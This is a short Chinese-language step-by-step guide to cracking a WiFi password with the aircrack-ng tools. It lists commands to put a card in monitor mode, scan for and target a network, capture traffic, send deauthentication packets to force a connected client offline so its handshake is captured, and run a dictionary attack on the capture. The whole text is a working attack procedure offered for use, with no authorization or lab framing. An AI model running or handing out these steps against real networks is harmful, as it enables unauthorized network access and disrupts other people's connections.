1. airmon-ng   #查看所有无线网卡

2. airmon-ng start wlan0  #从上面的查看结果选出一个，改为混杂模式，从上图中可以看到只有一个wlan0，直接选择这个。从下图可以看到混杂模式下网卡的名字不再是wlan0,而是mon0了。

3. airodump-ng mon0  #查看周围所有的wifi的信息，找到自己要破解的那个wifi，并记下mac硬件地址,还有其所在的频道。这里的mon0就是指上面那个混杂模式下的网卡

4. airodump-ng -c 11 -w file(保存收到的数据) --bssid 00:11:22:33:44:55(上面的mac) mon0。这条命令就是来抓包的-w后面是你要保存包的名字

5. aireplay-ng -0 5 --ignore-negative-one  -a  10:47:80:C9:AF:A1(wifi的mac) -c 7c:fa:df:58:71:dc(连上wifi的client的mac) mon0  #直接攻击客户端下线，然后重连时就可以找到握手包了

6. aircrack-ng file.cap -w passwd(密码字典)